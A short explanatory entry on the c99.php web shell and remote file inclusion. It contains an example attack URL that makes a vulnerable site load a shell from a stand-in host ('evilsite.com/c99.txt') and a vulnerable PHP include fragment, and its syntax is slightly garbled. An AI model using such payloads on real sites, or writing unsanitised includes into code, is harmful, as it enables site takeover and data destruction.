c99.php

People use c99shells while exploiting sites vulnerable to RFI. Using a c99 shell, they can configure dirs, delete content, replace existing content, etc. An example attack may be:

www.somesite.com/?page.php?page=www.evilsite.com/c99.txt?

This is due to unsanitized/poor coding, e.g in which there's no switch statement present.

Another example would be ; include($page); ?> so our URL would be site.com/site.php?page=anythingwewanthere.